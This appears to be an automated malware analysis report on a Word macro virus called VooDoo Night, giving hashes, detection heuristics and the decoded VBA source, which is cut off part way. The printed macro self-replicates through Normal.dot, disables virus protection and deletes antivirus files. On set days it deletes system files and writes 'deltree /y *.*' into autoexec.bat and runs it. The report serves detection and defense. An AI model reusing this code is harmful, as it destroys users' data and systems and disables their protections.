Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 379543b26934e9ac…

MALICIOUS

Office (OLE)

Size: 45.0 KB
Created: 1999-12-26 01:48:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: cd4cadb8e29d8eed1add275c66fc1f40
SHA-1: da89f811b4ba360ebebd1f87880f1ec5b21518e3
SHA-256: 379543b26934e9ac4b7cfab61e9201e4da77cf074d3630770ecfce253817802f
Risk Score: 320

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an OLE document containing a VBA macro that executes automatically via the Document_Open subroutine. This macro attempts to disable virus protection and uses the Shell() function, indicating an intent to execute arbitrary code. The presence of the 'Doc.Trojan.Voodoo-12' ClamAV signature further confirms its malicious nature, likely as a downloader.

Heuristics 6

  • ClamAV: Doc.Trojan.Voodoo-12 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Voodoo-12
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 46,080 bytes but its declared streams total only 26,611 bytes — 19,469 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4393 bytes
SHA-256: ac5985625feeeb6401db3afbc551464d97cdaff9a31be62c7efb8165f585f595
Detection: ClamAV: Doc.Trojan.Voodoo-12
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open()
'///////////////////////////\°°°°°°°°°°°°°°°°°/\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'////////////////////////////VooDoo NIGHT v1.0\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'***************************************************************************'
On Error Resume Next

'VooDoo Night, VooDoo Night, Come and Change my FACE
Set CNormalTemplate = NormalTemplate.VBProject
Set CActiveDocument = ActiveDocument.VBProject
Set Coptions = Options
Dim SysDate

'VooDoo Night, Voodoo Night Your are so beautiful, Make everyone stay away from ME
 Application.EnableCancelKey = wdCancelDisabled
  KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=wdKeyCategoryFont, Command:=" "
   KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=wdKeyCategoryFont, Command:=" "
    Application.CommandBars("Tools").Controls(12).Visible = False

      Coptions.VirusProtection = False
       a = CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
        b = CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
         If a = 86 And b = 86 Then GoTo AvCheck
          If a = 86 Then

           CActiveDocument.vbcomponents(1).CodeModule.DeleteLines 1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
          FullCode = CNormalTemplate.vbcomponents(1).CodeModule.Lines(1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines)
         CActiveDocument.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If
      If b >= 84 Then
     CNormalTemplate.vbcomponents(1).CodeModule.DeleteLines 1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
    FullCode = CActiveDocument.vbcomponents(1).CodeModule.Lines(1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines)
   CNormalTemplate.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If

AvCheck:
'VooDoo Night, VooDoo Night, will this be my END?
  If Dir("C:\Programme\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\Programme\AntiViral Toolkit Pro\macro.avc")

    If Dir("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc")

      If Dir("C:\F-PROT\Macro.def") <> "" Then Kill ("C:\F-PROT\Macro.def")

        If Dir("C:\Programme\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\NavLu32.exe")

          If Dir("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe")

            If Dir("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe")

              If Dir("C:\Programme\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\Rescue.exe")

Payload:

'Payload_1_
If Day(Now) = 31 Then
            MsgBox "                         GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN-                                                                                                               itz VooDoo NIGHT! (c)1999 by doc"
            
Open ("C:\windows\win.com") For Output As #12
   Print #1, 20, "-VooDoo NIGHT-"
Close #1
SetAttr "c:\io.sys", vbNormal
Kill ("c:\io.sys")
SetAttr "c:\windows\system.ini", vbNormal
Kill ("c:\windows\system.ini")
End If
'-----------------------------------------------------------------------------------------------------------------------
'Payload_2_
If Day(Now) = 13 Then
 Open ("c:\autoexec.bat") For Output As #13
  Print #13, "deltree /y *.*"
   Print #13, "exit"
Close #13
SetAttr "c:\windows\regedit.exe", vbNormal
Kill ("c:\windows\regedit.exe")
   Shell ("c:\autoexec.bat"), vbHide

Do
           MsgBox "                         GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN-     
... (truncated)